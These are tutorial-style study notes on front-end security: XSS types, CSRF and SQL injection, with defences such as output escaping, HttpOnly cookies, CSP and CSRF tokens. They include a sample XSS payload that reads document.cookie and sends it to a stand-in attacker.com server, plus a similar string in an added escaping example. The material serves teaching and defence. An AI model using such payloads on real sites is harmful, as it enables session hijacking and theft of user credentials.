front-end security


1. XSS (cross-site scripting)

1.1 principle

  1. attackers inject malicious script into the page

reflected XSS

principle

  1. the script is injected into a URL parameter
  2. it runs when the victim clicks the link

condition example

  1. the URL parameter is written into the page as HTML without any filtering

stored XSS

principle

  1. the attacker stores the XSS payload in the site's database
  2. when a user visits the page, the malicious code is injected into the page

condition example

  1. malicious code is entered through a page input component, such as a comment field
  2. it runs every time the comment is displayed

malicious code example

<script>
// read the victim's cookie and send it to the attacker's server
var cookie = document.cookie;
var xhr = new XMLHttpRequest();
var url = `https://www.attacker.com?usercookie=${cookie}`;
xhr.open('GET', url);
xhr.send();
</script>

difference between stored XSS and reflected XSS

  1. reflected XSS needs a new URL for each new attack
  2. stored XSS keeps working indefinitely from a single injection

vulnerabilities that can be used for XSS

  1. lack of input checking
  2. lack of output filtering (escaping)

measures to protect against XSS

filter input

  1. filter out characters that are not letters, digits or whitespace
str.replace(/[^\w\s]/g, '')
  2. escape special characters in the output
> becomes &gt; and < becomes &lt;
  3. escape special characters inside JS strings
add a backslash before each special character

str.replace method

  1. the second parameter can be a function
  2. that function receives the matched substring from str
str.replace(/[<>&]/g, function (match) {
  switch (match) {
    case '<': return '&lt;';
    case '>': return '&gt;';
    case '&': return '&amp;';
  }
})

URL encode

return encodeURI(url) or encodeURIComponent(url)
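
The three escaping rules above (HTML output, JS string literals, URL parameters) written out as one runnable helper; this is an added example for this note, not the author's code, and the function names and the STORED_COMMENT sample are constructed assumptions.

```javascript
// Added example (not from the original note): context-aware output
// escaping for the three sinks the note lists.

// HTML body context: the map driving the replace() callback.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(str) {
  // replace() with a function as second argument; it receives the matched character
  return String(str).replace(/[&<>"']/g, function (match) {
    return HTML_ESCAPES[match];
  });
}

// JS string-literal context: backslash-escape anything that could end the
// literal, break the line, or close the surrounding <script> element.
function escapeJsString(str) {
  return String(str).replace(/[\\'"\n\r\u2028\u2029<>\/]/g, function (match) {
    switch (match) {
      case '\n': return '\\n';
      case '\r': return '\\r';
      case '\u2028': return '\\u2028';
      case '\u2029': return '\\u2029';
      case '<': return '\\x3c';
      case '>': return '\\x3e';
      case '/': return '\\/';
      default: return '\\' + match; // backslash and both quote characters
    }
  });
}

// URL context: encode one query value, not the whole URL, so '&' and '='
// inside the value cannot add or overwrite parameters.
function queryParam(name, value) {
  return encodeURIComponent(name) + '=' + encodeURIComponent(value);
}

// Constructed stored comment shaped like the payload in the note (hypothetical input).
const STORED_COMMENT = "<script>var u='https://www.attacker.com?usercookie='+document.cookie;</script>";

// Rendering the stored comment into the page body: the escaped form is inert text.
function renderComment(comment) {
  return '<p class="comment">' + escapeHtml(comment) + '</p>';
}

// Embedding the same kind of value inside an inline script string literal.
function scriptWithValue(value) {
  return "<script>var name = '" + escapeJsString(value) + "';</script>";
}
```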

use HttpOnly cookies

  1. adding HttpOnly to the Set-Cookie value means the cookie is only sent to the server and cannot be read by page scripts
'Set-Cookie': 'mycookie=value; HttpOnly'

set CSP

  1. add a meta element with the http-equiv="Content-Security-Policy" attribute
  2. default-src 'self' means resources can only be loaded from the same origin
<meta http-equiv="Content-Security-Policy" content="default-src 'self'">

2. CSRF

  1. cross-site request forgery
  2. forges requests on behalf of the user

principle

  1. exploits a weakness in how the browser applies the same-origin policy
  2. for simple requests such as <img> and <form>, the browser automatically attaches cookies and does not check whether the request is same-origin
  3. so the malicious request carries the cookie and is authorised

how to protect

  1. use the Origin or Referer request header to decide whether the origin is allowed
  2. add a token when submitting the form
  3. block cross-site cookies by adding SameSite=Strict to the cookie header
  4. second confirmation, such as entering a verification code

3. SQL injection

definition

  1. SQL code is injected through an input component
  2. the malicious code runs and accesses the database